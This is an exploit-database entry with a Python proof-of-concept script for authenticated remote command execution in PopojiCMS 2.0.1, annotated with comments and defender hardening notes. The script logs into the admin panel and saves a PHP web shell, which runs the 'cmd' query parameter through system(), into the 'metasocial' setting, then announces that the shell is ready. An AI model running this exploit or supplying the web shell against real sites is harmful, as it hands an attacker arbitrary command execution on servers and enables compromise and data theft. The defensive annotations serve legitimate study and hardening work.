## https://sploitus.com/exploit?id=PACKETSTORM:178630
# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution  
# Date: 14/04/2024  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.popojicms.org/  
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip  
# Version: 2.0.1  
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS  
  
import requests  
import time  
import sys  
  
# Authenticated proof of concept for PopojiCMS 2.0.1: log in to the admin
# panel with the supplied credentials, then save PHP code as the value of the
# "metasocial" setting. Prints progress and returns None on every path.
#
# Parameters: url is the site base URL (no trailing path), username/password
# are credentials for an account that can reach /po-admin.
#
# Reviewer notes for defenders:
# - Precondition: the script only proceeds after a successful admin login, so
#   exposure depends on who holds or can guess admin credentials.
# - Observable requests: a POST to /po-admin/route.php?mod=login&act=proclogin
#   followed by a POST to /po-admin/route.php?mod=setting&act=metasocial whose
#   meta_content field contains "<?php" and a call to system().
# - Presumably the CMS later renders the stored meta_content as PHP; the
#   script does not show where, so confirm against the application code.
# - Hardening to consider: restrict access to /po-admin, strip or reject PHP
#   tags in the setting value server-side, alert on "<?php" in that field, and
#   list system() in PHP's disable_functions where the site does not need it.
def exploit(url, username, password):  
  
# Admin login endpoint and form fields posted to it.
login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"  
login_data = {"username": username, "password": password}  
# Form-encoded body plus a Referer pointing at the admin index page; the same
# headers are reused for the settings request below.
headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f  
"{url}/po-admin/index.php"}  
# A Session keeps the login cookies for the second request.
session = requests.Session()  
login_response = session.post(login_url, data=login_data, headers=headers)  
# Login success is inferred from a marker string in the response body, not
# from the HTTP status code.
if "Administrator PopojiCMS" in login_response.text:  
print("Login Successful!")  
time.sleep(1) # wait 1 second
else:  
print("Login Failed!")  
return  
  
# Settings endpoint that stores the "metasocial" value.
edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"  
# The submitted value is an HTML form plus a PHP block that passes the "cmd"
# query parameter to system(); a setting that should hold only meta tags is
# being used to carry server-side code.
edit_data = {"meta_content": """<html>  
<body>  
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">  
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">  
<input type="SUBMIT" value="Execute">  
</form>  
<pre>  
<?php  
if(isset($_GET['cmd']))  
{  
system($_GET['cmd']);  
}  
?>  
</pre>  
</body>  
</html>"""}  
edit_response = session.post(edit_url, data=edit_data, headers=headers)  
# Weak success check: only tests that the substring "cmd" appears somewhere in
# the response, which does not prove the value was stored or is executable.
if "cmd" in edit_response.text:  
# Prints the base URL only; the script does not identify which page serves
# the stored content.
print("Your shell is ready:", url)  
time.sleep(1)  
else:  
print("Exploit Failed!")  
return  
  
# Command-line entry point: requires exactly three arguments (site URL,
# username, password) and passes them to exploit() unchanged.
if __name__ == "__main__":  
if len(sys.argv) != 4:  
# Usage message is in Turkish ("Kullanım" means "Usage"); exits with status 1.
print("Kullanım: python exploit.py sitename username password")  
sys.exit(1)  
  
# No validation or normalisation is applied to the arguments.
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
# These status lines and sleeps are cosmetic: both messages are printed before
# any request is sent.
print("Exploiting...")  
time.sleep(1)  
print("Logging in...")  
time.sleep(1)  
exploit(url, username, password)